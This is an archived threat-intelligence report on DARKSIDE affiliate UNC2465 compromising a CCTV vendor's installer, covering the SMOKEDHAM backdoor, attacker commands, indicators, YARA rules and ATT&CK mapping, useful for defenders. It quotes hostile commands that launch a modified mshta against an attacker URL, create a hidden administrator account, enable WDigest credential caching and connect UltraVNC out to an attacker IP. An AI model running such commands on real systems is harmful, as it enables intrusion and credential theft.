{
	"id": "03ea1a6f-6472-4485-bdaa-b30aa248a8b2",
	"created_at": "2026-04-06T00:07:59.130208Z",
	"updated_at": "2026-04-10T13:11:32.033688Z",
	"deleted_at": null,
	"sha1_hash": "a9c4c67a8b0ee1573b20b31467145049d39216b5",
	"title": "Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2196594,
	"plain_text": "Smoking Out a DARKSIDE Affiliate’s Supply Chain Software\r\nCompromise\r\nBy Mandiant\r\nPublished: 2021-06-16 · Archived: 2026-04-05 15:46:13 UTC\r\nWritten by: Tyler McLellan, Robert Dean, Justin Moore, Nick Harbour, Mike Hunhoff, Jared Wilson, Jordan Nuce\r\nMandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software\r\ninstaller downloaded from a legitimate website. While this victim organization detected the intrusion, engaged\r\nMandiant for incident response, and avoided ransomware, others may be at risk.\r\nAs reported in the Mandiant post, \"Shining a Light on DARKSIDE Ransomware Operations,\" Mandiant\r\nConsulting has investigated intrusions involving several DARKSIDE affiliates. UNC2465 is one of those\r\nDARKSIDE affiliates that Mandiant believes has been active since at least March 2020.\r\nThe intrusion that is detailed in this post began on May 18, 2021, which occurred days after the publicly reported\r\nshutdown of the overall DARKSIDE program (Mandiant Advantage background). While no ransomware was\r\nobserved here, Mandiant believes that affiliate groups that have conducted DARKSIDE intrusions may use\r\nmultiple ransomware affiliate programs and can switch between them at will.\r\nSometime in May 2021 or earlier, UNC2465 likely Trojanized two software install packages on a CCTV security\r\ncamera provider website. Mandiant determined the installers were malicious in early June and notified the CCTV\r\ncompany of a potential website compromise, which may have allowed UNC2465 to replace legitimate downloads\r\nwith the Trojanized ones.\r\nWhile Mandiant does not suspect many victims were compromised, this technique is being reported for broader\r\nawareness. Software supply chain attacks can vary greatly in sophistication, from the recent FireEye-discovered\r\nSolarWinds attacks to attacks such as this targeting smaller providers. A software supply chain attack allows a\r\nsingle intrusion to obtain the benefit of access to all of the organizations that run that victim company’s software;\r\nin this case, an installer, rather than the software itself, was modified by UNC2465.\r\nDARKSIDE RaaS\r\nIn mid-May 2021, Mandiant observed multiple threat actors cite an announcement that appeared to be shared with\r\nDARKSIDE RaaS affiliates by the operators of the service. This announcement stated that they lost access to their\r\ninfrastructure, including their blog, payment, and content distribution network (CDN) servers, and would be\r\nclosing their service. The post cited law enforcement pressure and pressure from the United States for this\r\ndecision.\r\nMultiple users on underground forums have since come forward claiming to be unpaid DARKSIDE affiliates, and\r\nin some cases privately provided evidence to forum administrators who confirmed that their claims were\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 1 of 16\n\nlegitimate. There are some actors who have speculated that the DARKSIDE operator’s decision to close could be\r\nan exit scam. While we have not seen evidence suggesting that the operators of the DARKSIDE service have\r\nresumed operations, we anticipate that at least some of the former affiliates of the DARKSIDE service will likely\r\nidentify different ransomware or malware offerings to use within their own operations.\r\nNotably, Mandiant has continued to observe a steady increase in the number of publicly named victims on\r\nransomware shaming sites within the past month. Despite the recent ban of ransomware-related posts within\r\nunderground forums, threat actors can still leverage private chats and connections to identify ransomware services.\r\nAs one example, in mid-May 2021, the operator of the SODINOKIBI (aka REvil) RaaS indicated that multiple\r\naffiliates from other RaaS platforms that had shut down were switching to their service. Based on the perceived\r\nprofitability of these operations, it is almost certain that numerous threat actors will continue to conduct\r\nwidespread ransomware operations for the foreseeable future.\r\nBackground\r\nIn June 2021, Mandiant Consulting was engaged to respond to an intrusion. During analysis, Mandiant determined\r\nthe initial vector was a trojanized security camera PVR installer from a legitimate website. Mandiant attributed the\r\noverall intrusion activity to DARKSIDE affiliate UNC2465 due to continued use of infrastructure and tooling\r\nsince October 2020.\r\nOn May 18, 2021, a user in the affected organization browsed to the Trojanized link and downloaded the ZIP.\r\nUpon installing the software, a chain of downloads and scripts were executed, leading to SMOKEDHAM and\r\nlater NGROK on the victim’s computer. Additional malware use such as BEACON, and lateral movement also\r\noccurred. Mandiant believes the Trojanized software was available from May 18, 2021, through June 8, 2021.\r\nPivoting on the slightly modified, but benign, MSHTA.exe application in VirusTotal, Mandiant identified a second\r\ninstaller package with the MD5 hash, e9ed774517e129a170cdb856bd13e7e8 (SVStation_Win64-\r\nB1130.1.0.0.exe), from May 26, 2021, which also connects out the same URL as the Trojanized SmartPSS\r\ninstaller.\r\nSupply Chain Intrusion Cycle\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 2 of 16\n\nFigure 1: Intrusion cycle\r\nPhase 1: Trojanized Installer Download\r\nMandiant Consulting observed the Trojanized installer downloaded on a Windows workstation after the user\r\nvisited a legitimate site that the victim organization had used before.\r\nThe downloaded file was extracted to\r\nC:\\Users\\[username]\\Downloads\\06212019-General-SMARTPSS-Win32-ChnEng-IS\\General_SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023\\SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023-General-v1.exe.\r\nMandiant confirmed the user intended to download, install, and use the SmartPSS software. Figure 2 shows an\r\nimage of the download page used for SmartPSS software.\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 3 of 16\n\nFigure 2: SmartPSS download page\r\nPhase 2: Nullsoft Installer\r\nThe installer executable is a Nullsoft installer that when executed wrote two files to C:\\ProgramData\\SMARTPSS-Win32_ChnEng_IS. We were able to extract the malicious installer script and files for analysis using 7-Zip. The\r\nrelevant section of this installer script is shown below in Figure 3.\r\nFigure 3: Nullsoft installer script section\r\nThe installer script created two files: SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023-General.exe\r\n(b540b8a341c20dced4bad4e568b4cbf9) and smartpss.exe (c180f493ce2e609c92f4a66de9f02ed6). The former is a\r\nclean installer from the original developer and is launched first, installing the software as the user may expect. The\r\nlatter is launched with a command line URL executing the content.\r\nThe smartpss.exe file contained metadata describing itself as MSHTA.exe from Microsoft, a legitimate operating\r\nsystem component, but the MD5 hash was unknown. Disassembly analysis of the program showed it was a small\r\napplication that loaded the IE COM object and launched the function RunHTMLApplication() against the\r\ncommand line argument provided. This functionality matched the behavior of the legitimate MSHTA.exe despite\r\nthe hash discrepancy. Further analysis showed that the malware was based on a 2018 version of the binary\r\n(original hash: 5ced5d5b469724d9992f5e8117ecefb5) with only six bytes of data appended, as shown in Figure 4.\r\nFigure 4: CyberChef diff between MSHTA.exe and smartpss.exe\r\nPhase 3: Downloaded VBScript and PowerShell\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 4 of 16\n\nUpon execution, the modified Mshta file was executed with the URL, hxxp://sdoc[.]xyz/ID-508260156241, and\r\npassed as an argument on the command line.\r\nDomain sdoc[.]xyz was first associated with UNC2465 by RiskIQ in a May 20, 2021, blog post researching the\r\ninfrastructure that Mandiant previously reported. According to RiskIQ, sdoc[.]xyz shares a registrant with\r\nkoliz[.]xyz, which was also observed by Mandiant in past UNC2465 intrusions.\r\nC:\\PROGRAMDATA\\SMARTPSS-Win32_ChnEng_IS\\smartpss.exe hxxp://sdoc[.]xyz/ID-508260156241\r\nThe execution of the modified Mshta file resulted in the creation of a HTM file called loubSi78Vgb9[1].htm that\r\nwas written to a temporary INetCache directory. Mandiant was not able to acquire this file at the time of writing;\r\nhowever, Mandiant was able to recover partial contents of the file.\r\nFigure 5: PCAP from e9ed774517e129a170cdb856bd13e7e8 VirusTotal results not returning malicious content\r\nShortly after the download, a PowerShell script block was executed to download SMOKEDHAM, as shown in\r\nFigure 6.\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 5 of 16\n\nFigure 6: SMOKEDHAM downloader\r\nWithin seconds, a file named qnxfhfim.cmdline was written to disk and executed using the Command-Line\r\nCompiler.\r\ncsc.exe /noconfig /fullpaths @'C:\\Users\\ [username]\\AppData\\Local\\Temp\\qnxfhfim\\qnxfhfim.cmdline'\r\nMandiant was not able to recover this file at the time of writing; however, Mandiant was able to recover partial\r\ncontents of the file.\r\n.../t:library /utf8output /R:'System.dll' /R:'C:\\windows\\Microso\r\nAfter the execution of qnxfhfim.cmdline, PowerShell initiated the first connection to the fronted domain\r\nlumiahelptipsmscdnqa[.]microsoft[.]com used by SMOKEDHAM.\r\nPhase 4: SMOKEDHAM Dropper\r\nThe SMOKEDHAM dropper (f075c2894ac84df4805e8ccf6491a4f4) is written in PowerShell and decrypts and\r\nexecutes in memory the SMOKEDHAM backdoor. The dropper uses the Add-Type cmdlet to define a new .NET\r\nclass for the backdoor. The Add-Type cmdlet can be used to define a new .NET class using an existing assembly\r\nor source code files or specifying source code inline or saved in a variable. In this case, the dropper uses\r\nSMOKEDHAM backdoor source code that is stored in a variable.\r\nThe SMOKEDHAM backdoor source code is embedded as an encrypted string. The dropper uses the ConvertTo-SecureString cmdlet and an embedded key to decrypt the source code prior to executing the Add-Type cmdlet.\r\nAfter defining a new .NET class for the backdoor, the dropper executes the backdoor's entry point. The dropper\r\nconfigures the backdoor with a C2 server address, RC4 encryption key, and sleep interval. Figure 7 shows the\r\ndeobfuscated SMOKEDHAM dropper.\r\nFigure 7: SMOKEDHAM dropper\r\nPhase 5: SMOKEDHAM Backdoor\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 6 of 16\n\nSMOKEDHAM (127bf1d43313736c52172f8dc6513f56) is a .NET-based backdoor that supports commands,\r\nincluding screen capture and keystroke capture. The backdoor may also download and execute additional\r\nPowerShell commands from its command and control (C2) server.\r\nSMOKEDHAM Network Communications\r\nSMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate\r\nits true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication.\r\nThe communication between SMOKEDHAM and its C2 server consists of JSON data exchanged via HTTP POST\r\nrequests. The backdoor initiates requests to the C2 server and the C2 server may include commands to execute in\r\nthe responses. The JSON data exchanged between SMOKEDHAM and its C2 server contains three fields: ID,\r\nUUID, and Data.\r\nThe ID field contains a unique value generated by the backdoor for the target system.\r\nThe UUID field may contain a unique value used to track command output or be empty. When the C2 server\r\nresponds with a command to execute, it sets the UUID field to a unique value. SMOKEDHAM then sets the same\r\nUUID value in the subsequent HTTP POST request that contains the command output.\r\nThe Data field may contain RC4-encrypted, Base64-encoded command data or be empty. The backdoor uses the\r\nData field to send command output to its C2 server. The C2 server uses the Data field to send commands to the\r\nbackdoor to execute. The backdoor uses an RC4 key configured by an earlier stage of execution to encrypt and\r\ndecrypt the Data field. Mandiant observed the RC4 key UwOdHsFXjdCOIrjTCfnblwEZ used for RC4 encryption\r\nand decryption.\r\nSMOKEDHAM Commands\r\nSMOKEDHAM Base64-decodes, and RC4-decrypts command data returned in the Data field. The backdoor\r\nchecks if the plaintext command data begins with one of the following keywords, shown in Table 1.\r\nKeyword Action\r\ndelay Update its sleep interval\r\nscreenshot Upload a screen capture to its C2 server via a subsequent HTTP POST request\r\nexit Terminate\r\nTable 1: Plaintext command data keywords\r\nIf the plaintext command data does not begin with any of the keywords listed in Table 1, then SMOKEDHAM\r\nassumes the data contains a PowerShell command and attempts to execute it. The backdoor uploads output\r\ngenerated by the PowerShell command to its C2 server via a subsequent HTTP POST request.\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 7 of 16\n\nIn addition to supporting the commands in Table 1, SMOKEDHAM continuously captures keystrokes. The\r\nbackdoor writes captured keystrokes to memory and uploads them to its C2 server every five seconds via HTTP\r\nPOST requests.\r\nSMOKEDHAM In Action\r\nSMOKEDHAM was observed executing commands on the target system using PowerShell.\r\nThe following commands were used to collect information about the system and logged in users.\r\nnet.exe user\r\nnet.exe users\r\nwhoami.exe\r\nwhoami.exe /priv\r\nsysteminfo.exe\r\nThe following commands were used to create and add the DefaultUser account to the local Administrators group,\r\nand subsequently hide the account from the Windows logon screen.\r\nnet.exe user DefaultUser REDACTED /ADD\r\nnet.exe localgroup Administrators DefaultUser /ADD\r\nreg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList' /v DefaultUser\r\nThe following commands facilitated lateral movement by modifying Terminal Server registry key values to enable\r\nmultiple Remote Desktop connection sessions, and modifying the Local Security Authority (LSA) registry key\r\nvalue to require a password for authentication.\r\nreg.exe ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nreg.exe ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' /v fSingleSessionPerUser /t REG_DWORD /d 0 /\r\nreg.exe ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v LimitBlankPasswordUse /t REG_DWORD /d 1 /f\r\nAdditionally, SMOKEDHAM modified the WDigest registry key value\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential\r\nto enable credential caching.\r\nPhase 6: Follow-on Activity\r\nSMOKEDHAM used PowerShell to connect to third-party file sharing sites to download the UltraVNC\r\napplication renamed as winvnc.exe, and a configuration file named UltraVNC.ini, shown in Figure 8. These files\r\nwere saved to the %APPDATA%\\Chrome\\ directory. The UltraVNC.ini file allowed UltraVNC to connect to port\r\n6300 on the loopback address specified by the parameter AllowLoopback=1.\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 8 of 16\n\nFigure 8: Contents of UltraVNC.ini\r\nSMOKEDHAM was observed using UltraVNC to establish a connection to the IP address and port pair\r\n81.91.177[.]54[:]7234 that has been observed in past UNC2465 intrusions.\r\n%APPDATA%\\Chrome\\winvnc.exe' -autoreconnect ID:15000151 -connect 81.91.177[.]54[:]7234 –run\r\nSMOKEDHAM created a persistence mechanism for UltraVNC by adding the application to the ConhostNT value\r\nunder the current users Run registry key.\r\nreg.exe add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v ConhostNT /d %appdata%\\Chrome\\winvnc.exe\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 9 of 16\n\nNGROK Configuration\r\nSMOKEDHAM used PowerShell to connect to third-party file sharing sites to download an NGROK utility that\r\nwas renamed conhost.exe, and a script named VirtualHost.vbs that was used to execute NGROK with a\r\nconfiguration file named ngrok.yml. These files were stored in the C:\\ProgramData\\WindNT\\ directory. NGROK\r\nis a publicly available utility that can expose local servers behind NATs and firewalls to the public internet over\r\nsecure tunnels.\r\nFigure 9 and Figure 10 show the contents of VirtualHost.vbs and ngrok.yml files, respectively.\r\nFigure 9: Contents of VirtualHost.vbs\r\nFigure 10: Contents of ngrok.yml\r\nThe execution of VirtualHost.vbs allowed NGROK to listen and forward traffic on TCP port 6300 through an\r\nNGROK tunnel, subsequently allowing NGROK to tunnel UltraVNC traffic out of the environment.\r\nSMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value\r\nunder the current users Run registry key.\r\nreg.exe add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindNT /d C:\\ProgramData\\WindNT\\VirtualHost.v\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 10 of 16\n\nKeylogger Deployment\r\nThis attacker utilized an additional keylogging utility named C:\\ProgramData\\psh\\console.exe. The keylogging\r\nutility was configured to capture and record keystrokes to C:\\ProgramData\\psh\\System32Log.txt.\r\nMandiant then observed the attacker use UltraVNC to download two LNK files that reference the keylogging\r\nutility. The downloaded files were named desktop.lnk and console.lnk, respectively, and were placed in the\r\nfollowing persistence locations:\r\nC:\\Users\\[username]\\Start Menu\\Programs\\Startup\\desktop.lnk\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.lnk\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\console.lnk\r\nCobalt Strike Beacon\r\nThe attacker used UltraVNC to download an in-memory dropper for Cobalt Strike to C:\\ProgramData\\Cisco\r\nSystems\\Cisco Jabber\\update.exe. Update.exe was a Go based dropper created using the ScareCrow framework.\r\nThe attacker executed C:\\ProgramData\\Cisco Systems\\Cisco Jabber\\update.exe using Command Prompt.\r\ncmd.exe /c 'C:\\ProgramData\\Cisco Systems\\Cisco Jabber\\update.exe'\u0026\u0026exit\r\nThe execution of ScareCrow framework dropper C:\\ProgramData\\Cisco Systems\\Cisco Jabber\\update.exe resulted\r\nin the creation of a Cobalt Strike stageless payload to C:\\ProgramData\\Cisco\\update.exe, which then established a\r\nconnection to a Cobalt Strike Beacon server located at w2doger[.]xyz when executed.\r\nMandiant observed the attacker using UltraVNC to download and store a file named update.lnk in the\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ directory. Mandiant was not able to recover\r\nupdate.lnk at the time of writing, but suspects that this file was created to add persistence to the Cobalt Strike\r\nstageless payload.\r\nLSASS Dumping and Lateral Movement\r\nMandiant observed this attacker dump the LSASS process using Task Manager to a file named lsass.DMP, and\r\nlater, zip the dump into two files named lsass.zip and lsass2.zip located in the C:\\ProgramData\\psh\\ directory.\r\nFrom this point, the attacker was observed moving laterally to different systems in the environment using Remote\r\nDesktop Protocol (RDP) connections.\r\nConclusion\r\nUNC2465 established initial access via a Trojanized installer executed by an unsuspecting user. UNC2465\r\ninteractively established an NGROK tunnel and began moving laterally in less than 24 hours. Five days later,\r\nUNC2465 returned and deployed additional tools such as a keylogger, Cobalt Strike BEACON, and conducted\r\ncredential harvesting via dumping LSASS memory.\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 11 of 16\n\nRansomware groups continue to adapt and pursue opportunistic access to victims. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that\r\npresents new challenges for detection. While many organizations are now focusing more on perimeter defenses\r\nand two-factor authentication after recent public examples of password reuse or VPN appliance exploitation,\r\nmonitoring on endpoints is often overlooked or left to traditional antivirus. A well-rounded security program is\r\nessential to mitigate risk from sophisticated groups such as UNC2465 as they continue to adapt to a changing\r\nsecurity landscape.\r\nIndicators\r\nSupply Chain/Trojanized Nullsoft Installer/SmartPSS\r\nMD5: 1430291f2db13c3d94181ada91681408\r\nFilename: SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023-General-v1.exe\r\nZip MD5: 54e0a0d398314f330dfab6cd55d95f38\r\nSupply Chain/Trojanized Nullsoft Installer/SVStation\r\nMD5: e9ed774517e129a170cdb856bd13e7e8\r\nFilename: SVStation_Win64-B1130.1.0.0.exe\r\nIntermediate Stage\r\nURL: hxxp://sdoc[.]xyz/ID-508260156241\r\nIP: 185.92.151[.]150\r\nSMOKEDHAM LOADER\r\nMD5: f075c2894ac84df4805e8ccf6491a4f4 (Gbdh7yghJgbj3bb.html)\r\nMD5: 05d38c7e957092f7d0ebfc7bf1eb5365\r\nSMOKEDHAM\r\nMD5: 127bf1d43313736c52172f8dc6513f56 (in-memory from f075c2894ac84df4805e8ccf6491a4f4)\r\nHost: max-ghoster1.azureedge[.]net (actual C2)\r\nMD5: 9de326bf37270776b78e30d442bda48b (MEtNOcyfkXWe.html)\r\nHost: atlant20.azureedge[.]net (actual C2)\r\nMD5: b06319542cab55346776f0358a61b3b3 (in-memory from 05d38c7e957092f7d0ebfc7bf1eb5365)\r\nHost: skolibri13.azureedge[.]net (actual C2)\r\nNGROK\r\nMD5: e3bc4dd84f7a24f24d790cc289e0a10f (legitimate NGROK renamed to conhost.exe)\r\nMD5: 84ed6012ec62b0bddcd18058a8ff7ddd (VirtualHost.vbs)\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 12 of 16\n\nUltraVNC\r\nIP/Port: 81.91.177[.]54:7234 (using legitimate ULTRAVNC 23b89bf2c2b99fbc1e232b4f86af65f4)\r\nBEACON\r\nHost: w2doger[.]xyz\r\nIP: 185.231.68.102\r\nMD5: a9fa3eba3f644ba352462b904dfbcc1a (shellcode)\r\nDetecting the Techniques\r\nFireEye detects this activity across our platforms. The following contains specific detection names that provide\r\nindicators associated with this activity.\r\nPlatform Detection Name\r\nFireEye Network\r\nSecurity\r\nFireEye Email\r\nSecurity\r\nFireEye Detection On\r\nDemand\r\nFireEye Malware\r\nAnalysis\r\nFireEye Malware File\r\nProtect\r\nBackdoor.BEACON\r\nFE_Loader_Win32_BLUESPINE_1\r\nTrojan.Win32.CobaltStrike\r\nBackdoor.MSIL.SMOKEDHAM\r\nMalware.Binary.ps1\r\nFEC_Backdoor_CS_SMOKEDHAM_1\r\nSuspicious Process PowerShell Activity\r\nFireEye Endpoint\r\nSecurity Real-Time Detection (IOC)\r\nWDIGEST CREDENTIAL EXPOSURE (METHODOLOGY)\r\nWDIGEST CREDENTIAL EXPOSURE VIA REGISTRY\r\n(METHODOLOGY)\r\nSUSPICIOUS CONHOST.EXE A (METHODOLOGY)\r\nTASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\r\nMalware Protection (AV/MG)\r\nTrojan.GenericFCA.Script.533\r\nTrojan.GenericFCA.Agent.7732\r\nDropped:Trojan.VBS.VGU\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 13 of 16\n\nTrojan.CobaltStrike.FM\r\nNGRok\r\nUltra VNC\r\nSVN Station\r\nGeneric.mg.a9fa3eba3f644ba3\r\nGeneric.mg.1626373508569884\r\nModules\r\nProcess Guard (LSASS memory protection)\r\nFireEye Helix\r\nVNC METHODOLOGY [Procs] (T1021.005)\r\nWINDOWS ANALYTICS [Abnormal RDP Logon] (T1078)\r\nWINDOWS ANALYTICS [Recon Commands] (T1204)\r\nWINDOWS METHODOLOGY [Cleartext Credentials Enabled -\r\nUseLogonCredential] (T1003.001)\r\nWINDOWS METHODOLOGY [LSASS Generic Dump Activity]\r\n(T1003.001)\r\nWINDOWS METHODOLOGY [LSASS Memory Access] (T1003.001)\r\nWINDOWS METHODOLOGY [Registry Run Key - reg.exe] (T1547.001)\r\nWINDOWS METHODOLOGY [User Created - Net Command]\r\n(T1136.001)\r\nYara Detections\r\nrule Backdoor_Win_SMOKEDHAM\r\n{\r\nmeta:\r\nauthor = \"Mandiant\"\r\ndate_created = \"2021-06-10\"\r\nmd5 = \"9de326bf37270776b78e30d442bda48b\"\r\nstrings:\r\n$C2Method = { 2E 4D 65 74 68 6F 64 20 3D 20 22 50 4F 53 54 22 } //.Method = \"POST\"\r\n$domainFrontingDomain = /\\.[hH]ost\\s*=\\s*\\\"[^\\\"]*\";/\r\n$envCollection1 = { 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 47 65 74 45 6E 76 69 72 6F 6E 6D 65 6E 74 56 61 72 69 61\r\n$envCollection2 = { 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 47 65 74 45 6E 76 69 72 6F 6E 6D 65 6E 74 56 61 72 69 61\r\n$envCollection3 = { 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 47 65 74 45 6E 76 69 72 6F 6E 6D 65 6E 74 56 61 72 69 61\r\n$functionalityString1 = { 28 22 64 65 6C 61 79 22 29 } //(\"delay\")\r\n$functionalityString2 = { 28 22 73 63 72 65 65 6E 73 68 6F 74 22 29 } //(\"screenshot\")\r\n$functionalityString3 = { 28 22 65 78 69 74 22 29 } //(\"exit\")\r\n$publicStrings1 = \"public string UUID\"\r\n$publicStrings2 = \"public string ID\"\r\n$publicStrings3 = \"public string Data\"\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 14 of 16\n\n$UserAgentRequest = { 20 3D 20 45 6E 76 69 72 6F 6E 6D 65 6E 74 2E 4F 53 56 65 72 73 69 6F 6E 2E 54 6F 53 74 72\r\ncondition:\r\nfilesize \u003c 1MB and all of them\r\n}\r\nrule Loader_Win_SMOKEDHAM\r\n{\r\nmeta:\r\nauthor = \"Mandiant\"\r\ndate_created = \"2021-06-10\"\r\nmd5 = \"05d38c7e957092f7d0ebfc7bf1eb5365\"\r\nstrings:\r\n$listedDLLs1 = \"System.Drawing.dll\" fullword\r\n$listedDLLs2 = \"System.Web.Extensions.dll\" fullword\r\n$listedDLLs3 = \"System.Windows.Forms.dll\" fullword\r\n$CSharpLang = {2d 4c 61 6e 67 75 61 67 65 20 43 53 68 61 72 70} // -Language CSharp\r\n$StringConversion = \"convertto-securestring\" nocase\r\n$SecureString1 = {5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2\r\n$SecureString2 = {5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2\r\ncondition:\r\nfilesize \u003c 1MB and (1 of ($listedDLLs*)) and $CSharpLang and $StringConversion and $SecureString1 and $SecureStr\r\n}\r\nMITRE ATT\u0026CK UNC2465\r\nTactic Description\r\nInitial Access\r\nT1189: Drive-by Compromise\r\nT1195.002: Compromise Software Supply Chain\r\nT1566: Phishing\r\nExecution\r\nT1053.005: Scheduled Task\r\nT1059.001: PowerShell\r\nT1059.005: Visual Basic\r\nPersistence\r\nT1098: Account Manipulation\r\nT1136: Create Account\r\nT1547.001: Registry Run Keys / Startup Folder\r\nT1547.004: Winlogon Helper DLL\r\nT1547.009: Shortcut Modification\r\nDefense Evasion T1027: Obfuscated Files or Information\r\nT1070.006: Timestomp\r\nT1112: Modify Registry\r\nT1140: Deobfuscate/Decode Files or Information\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 15 of 16\n\nT1218.005: Mshta\r\nT1553.002: Code Signing\r\nT1562.004: Disable or Modify System Firewall\r\nDiscovery\r\nT1012: Query Registry\r\nT1033: System Owner/User Discovery\r\nT1082: System Information Discovery\r\nCollection\r\nT1056.001: Keylogging\r\nT1113: Screen Capture\r\nT1560: Archive Collected Data\r\nImpact\r\nT1486: Data Encrypted for Impact\r\nT1531: Account Access Removal\r\nCommand and Control\r\nT1071.001: Web Protocols\r\nT1090.004: Domain Fronting\r\nT1102: Web Service\r\nT1105: Ingress Tool Transfer\r\nT1219: Remote Access Software\r\nT1572: Protocol Tunneling\r\nT1573.002: Asymmetric Cryptography\r\nLateral Movement\r\nT1021.004: SSH\r\nT1021.005: VNC\r\nCredential Access T1003.001: LSASS Memory\r\nResource Development\r\nT1588.003: Code Signing Certificates\r\nT1588.004: Digital Certificates\r\nT1608.003: Install Digital Certificate\r\nAcknowledgements\r\nThanks to everyone that contributed analysis and review. Special thanks to Alison Stailey, Joseph Reyes, Nick\r\nRichard, Andrew Thompson, Jeremy Kennelly, Joshua Sablatura, Evan Reese, Van Ta, Stephen Eckels, and Tufail\r\nAhmed.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise"
	],
	"report_names": [
		"darkside-affiliate-supply-chain-software-compromise"
	],
	"threat_actors": [
		{
			"id": "e9f7f836-b77f-4f95-aa02-9e99d32faf1d",
			"created_at": "2024-12-21T02:00:02.857057Z",
			"updated_at": "2026-04-10T02:00:03.791142Z",
			"deleted_at": null,
			"main_name": "UNC2465",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC2465",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434079,
	"ts_updated_at": 1775826692,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a9c4c67a8b0ee1573b20b31467145049d39216b5.pdf",
		"text": "https://archive.orkl.eu/a9c4c67a8b0ee1573b20b31467145049d39216b5.txt",
		"img": "https://archive.orkl.eu/a9c4c67a8b0ee1573b20b31467145049d39216b5.jpg"
	}
}